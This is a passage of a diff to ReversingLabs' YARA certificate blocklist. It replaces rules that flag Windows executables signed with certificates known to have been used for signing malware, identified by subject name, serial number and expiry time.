-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14130-L14146"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8186-L8204"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3"
+		logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25901,21 +48295,21 @@ rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Joerm.com" and pe.signatures [ i ] . serial == "53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) and 1605830400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1eeff730-c2ce-5689-a8cb-455618738a82"
+		id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14148-L14166"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8206-L8224"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606"
+		logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25925,21 +48319,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:ed:9c:ae:b7:91:1b:31:bd" or pe.signatures [ i ] . serial == "ed:9c:ae:b7:91:1b:31:bd" ) and 1506001740 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHAT LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures [ i ] . serial == "ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab"
+		id = "c33d798a-854c-5fab-afbe-e94d142befa7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14168-L14184"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8226-L8244"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c"
+		logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25949,21 +48343,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAR AND CILLA LTD" and pe.signatures [ i ] . serial == "0f:d2:b1:9a:94:1b:70:09:cc:72:8a:37:cb:1b:10:b9" and 1560470400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures [ i ] . serial == "ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" ) and 1606089600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0e844bef-1cfe-5eba-af4d-d8477e55470c"
+		id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14186-L14202"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8246-L8262"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe"
+		logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25973,21 +48367,21 @@ rule REVERSINGLABS_Cert_Blocklist_2D88C0Af1Fe2609961C171213C03Bd23 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures [ i ] . serial == "2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c"
+		id = "00e096f6-2955-5936-9a75-f537c2da3621"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14204-L14220"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8264-L8280"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc"
+		logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25997,21 +48391,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SG Internet" and pe.signatures [ i ] . serial == "6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "60a3e63c-4f44-5c75-9928-69859d77af3e"
+		id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14222-L14240"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8282-L8298"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020"
+		logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26021,21 +48415,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures [ i ] . serial == "ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" ) and 1527811200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PILOTE SPRL" and pe.signatures [ i ] . serial == "2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9"
+		id = "02f2bf36-e573-502c-8ecc-843a6e627c2b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14242-L14258"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8300-L8316"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597"
+		logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26045,21 +48439,21 @@ rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9"
+		id = "a2795796-2897-55ad-936c-456c3b93bf14"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14260-L14276"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8318-L8336"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831"
+		logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26069,21 +48463,21 @@ rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures [ i ] . serial == "03:23:cc:4e:38:73:5b:0e:6e:fb:a7:6e:a2:5c:73:b7" and 1512000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and ( pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" or pe.signatures [ i ] . serial == "a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" ) and 1611792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bbd4Dc3768A51Aa2B3059C1Bad569276 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b78e3bc2-5b65-507a-9183-148f97baa3e8"
+		id = "ee861c79-fea2-5931-873d-b76e5bdef593"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14278-L14294"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8338-L8356"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d7c9a471455768a00deeb73900bf80a98f0b2c9da1fd09d568e2998deaf404d2"
+		logic_hash = "f336570834e0663c6e589fa22b3541f4f79c40ff945dd91f1fd1258a96adeceb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26093,21 +48487,21 @@ rule REVERSINGLABS_Cert_Blocklist_1F9Aca069Ac1B6Bfb0E14861Ec857Bf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "1f:9a:ca:06:9a:c1:b6:bf:b0:e1:48:61:ec:85:7b:f6" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and ( pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" or pe.signatures [ i ] . serial == "bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" ) and 1607472000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08622B9Dd9D78E67678Ecc21E026522E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ad650b2-45ea-5324-b8dc-b48094ae2376"
+		id = "66d942c7-ceb9-54e5-bccc-1adf641fd70e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14296-L14312"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8358-L8374"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d8f70ba61509f3df34705bea0bfcb4cce3e92a33f0f1b65315d886eb5592f152"
+		logic_hash = "09507b09b035195b74434f56041588f67245fa097183228dffc612bb4901825b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26117,21 +48511,21 @@ rule REVERSINGLABS_Cert_Blocklist_3E9D26Dcf703Ca3B140D7E7Ad48312E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dong Qian" and pe.signatures [ i ] . serial == "3e:9d:26:dc:f7:03:ca:3b:14:0d:7e:7a:d4:83:12:e2" and 1440580240 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" and 1611619200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E69A6De0074Ece38C2F30F0D4A808456 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "be5e6f35-6177-50bb-82ea-55628acda4c2"
+		id = "17571f1e-1dce-5216-8f45-467e5d77ccf1"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14314-L14330"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8376-L8394"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e89f722345fda82fd894d34169d1463997ae1d567d46badbf3138faa04cf8fa4"
+		logic_hash = "21d8641d2394120847044f0e6f4d868095a1e30c0b594a3d045877ab9b3808a1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26141,21 +48535,21 @@ rule REVERSINGLABS_Cert_Blocklist_4E2523E76Ea455941E75Fb8240474A75 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "4e:25:23:e7:6e:a4:55:94:1e:75:fb:82:40:47:4a:75" and 1476403200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Semantic" and ( pe.signatures [ i ] . serial == "00:e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" or pe.signatures [ i ] . serial == "e6:9a:6d:e0:07:4e:ce:38:c2:f3:0f:0d:4a:80:84:56" ) and 1611532800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8385684419Ab26A3F2640B1496E1Fe94 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bcf0f1cc-44f2-5498-b9d7-9ad3f38e33bc"
+		id = "03e861a0-156e-5366-a312-dc2aa73b0393"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14332-L14348"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8396-L8414"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c1ae1562595ac6515a071a16195b46db6fad4ee0fe9757d366ee78b914e1de7f"
+		logic_hash = "24f75badc335160a8053a4c7e8bbd8ddbd3266c3a18059a937d5989df97ae9d9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26165,21 +48559,21 @@ rule REVERSINGLABS_Cert_Blocklist_6102468293Ba7308D17Efb43Ad6Bfb58 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "61:02:46:82:93:ba:73:08:d1:7e:fb:43:ad:6b:fb:58" and 1470960000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and ( pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" or pe.signatures [ i ] . serial == "83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" ) and 1612137600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "033c9ce3-1676-5ad1-9ec1-08b3ffc585bb"
+		id = "fdb1903b-15c1-5cb7-892f-58957303d3b4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14350-L14366"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8416-L8432"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "20ec1e8e0570eb216304fd8453df315a26d9c170224177c325c10cbefc1993fb"
+		logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26189,21 +48583,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Ded1A7Ff6Da152A98A57A2F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "6d:ed:1a:7f:f6:da:15:2a:98:a5:7a:2f" and 1479094343 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f86fbd6f-1635-56d7-b390-e067f81b8705"
+		id = "d6cb1371-113d-5155-aed2-c575321f0973"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14368-L14384"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8434-L8450"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e17988cb2503e285cfe2ea74d7bc61c577d828e14fd5d8d8062e469dc75c449e"
+		logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26213,21 +48607,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Ce65Ea057B975D2C17Eaf2C2297B1Eb : INFO FILE
 		importance = 25
 
 	condition:
